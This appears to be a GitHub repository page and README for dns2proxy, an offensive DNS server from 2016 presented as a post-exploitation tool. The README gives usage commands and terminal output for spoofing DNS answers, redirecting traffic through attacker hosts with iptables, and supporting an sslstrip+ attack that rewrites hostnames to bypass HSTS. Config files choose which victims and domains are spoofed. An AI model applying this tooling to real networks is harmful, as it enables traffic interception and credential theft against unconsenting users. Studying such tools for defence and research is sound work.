Offensive DNS server
Python
Latest commit f8aafec Feb 5, 2016 LeonardoNve Bug in domains.cfg solved
Now domains.cfg can manage subdomains.
Permalink
Failed to load latest commit information.
.gitignore Clean & update Jan 28, 2016
README.md Clean & update Jan 28, 2016
dns2proxy.py Bug in domains.cfg solved Feb 5, 2016
domains.cfg Clean & update Jan 28, 2016
handler_msg.sh Clean & update Jan 28, 2016
nospoof.cfg Clean & update Jan 28, 2016
nospoofto.cfg Clean & update Jan 28, 2016
resolv.conf Clean & update Jan 28, 2016
spoof.cfg Clean & update Jan 28, 2016
victims.cfg Clean & update Jan 28, 2016

README.md

dns2proxy

Offensive DNS server

This tools offer a different features for post-explotation once you change the DNS server to a Victim.

Feature 1

Traditional DNS Spoof adding to the response the original IP address.

Using spoof.cfg file:

hostname ip.ip.ip.ip

root@kali:~/dns2proxy# echo "www.s21sec.com 1.1.1.1" > spoof.cfg

// launch in another terminal dns2proxy.py

root@kali:~/dns2proxy# nslookup www.s21sec.com 127.0.0.1
Server: 127.0.0.1
Address: 127.0.0.1#53

Name: www.s21sec.com
Address: 1.1.1.1
Name: www.s21sec.com
Address: 88.84.64.30

or you can use domains.cfg file to spoof all host of a same domain:

root@kali:~/demoBH/dns2proxy# cat dominios.cfg
.domain.com 192.168.1.1

root@kali:~/demoBH/dns2proxy# nslookup aaaa.domain.com 127.0.0.1
Server: 127.0.0.1
Address: 127.0.0.1#53

Name: aaaa.domain.com
Address: 192.168.1.1

Hostnames at nospoof.cfg will no be spoofed.

Feature 2

This feature implements the attack of DNS spoofing adding 2 IP address at the top of the resolution and configuring the system to forward the connections.
Check my slides at BlackHat Asia 2014 OFFENSIVE: EXPLOITING DNS SERVERS CHANGES and the Demo Video.

To launch this attach there is a shellscript that automatically configure the system using IP tables. You must edit this file to adapt it to your system. DON´T FORGET AdminIP variable!!!!
Both IPs must be at the same system to let dns2proxy.py configurate the forwarding

Usage: ia.sh < interface > [ip1] [ip2]

root@kali:~/dns2proxy# ./ia.sh eth0 172.16.48.128 172.16.48.230
Non spoofing imap.gmail.com
Non spoofing mail.s21sec.com
Non spoofing www.google.com
Non spoofing www.apple.com
Non spoofing ccgenerals.ms19.gamespy.com
Non spoofing master.gamespy.com
Non spoofing gpcm.gamespy.com
Non spoofing launch.gamespyarcade.com
Non spoofing peerchat.gamespy.com
Non spoofing gamestats.gamespy.com
Specific host spoofing www.s21sec.com with 1.1.1.1
Specific domain IP .domain.com with 192.168.1.1
binded to UDP port 53.
waiting requests.
Starting sniffing in (eth0 = 172.16.48.128)....

< at other terminal >

root@kali:~/dns2proxy# nslookup www.microsoft.com 127.0.0.1
Server: 127.0.0.1
Address: 127.0.0.1#53

Name: www.microsoft.com
Address: 172.16.48.128
Name: www.microsoft.com
Address: 172.16.48.230
Name: www.microsoft.com
Address: 65.55.57.27

The fhtang.sh script will terminate the program and restore normal iptables.

Hostnames at nospoof.cfg will no be spoofed.

Feature 3

Automatically the dns server detects and correct the changes thats my sslstrip+ do to the hostnames to avoid HSTS, so will response properly.

This server is necesary to make the sslstrip+ attack.

root@kali:~/dns2proxy# nslookup webaccounts.google.com 127.0.0.1 <-- DNS response like accounts.google.com
Server: 127.0.0.1
Address: 127.0.0.1#53

Name: webaccounts.google.com
Address: 172.16.48.128
Name: webaccounts.google.com
Address: 172.16.48.230
Name: webaccounts.google.com
Address: 74.125.200.84

root@kali:~/dns2proxy# nslookup wwww.yahoo.com 127.0.0.1 <-- Take care of the 4 w! DNS response like
Server: 127.0.0.1 www.yahoo.com
Address: 127.0.0.1#53

Name: wwww.yahoo.com
Address: 172.16.48.128
Name: wwww.yahoo.com
Address: 172.16.48.230
Name: wwww.yahoo.com
Address: 68.142.243.179
Name: wwww.yahoo.com
Address: 68.180.206.184

Instalation

dnspython (www.dnspython.com) is needed. Tested with Python 2.6 and Python 2.7.

Config files description

domains.cfg (or dominios.cfg): resolve all hosts for the listed domains with the listed IP

Ex: .facebook.com 1.2.3.4 .fbi.gov 1.2.3.4

spoof.cfg : Spoof a host with a ip

Ex: www.nsa.gov 127.0.0.1

nospoof.cfg: Send always a legit response when asking for these hosts.

Ex. mail.google.com

nospoofto.cfg: Don't send fake responses to the IPs listed there.

Ex: 127.0.0.1 4.5.6.8

victims.cfg: If not empty, only send fake responses to these IP addresses.

Ex: 23.66.163.36 195.12.226.131

resolv.conf: DNS server to forward the queries.

Ex: nameserver 8.8.8.8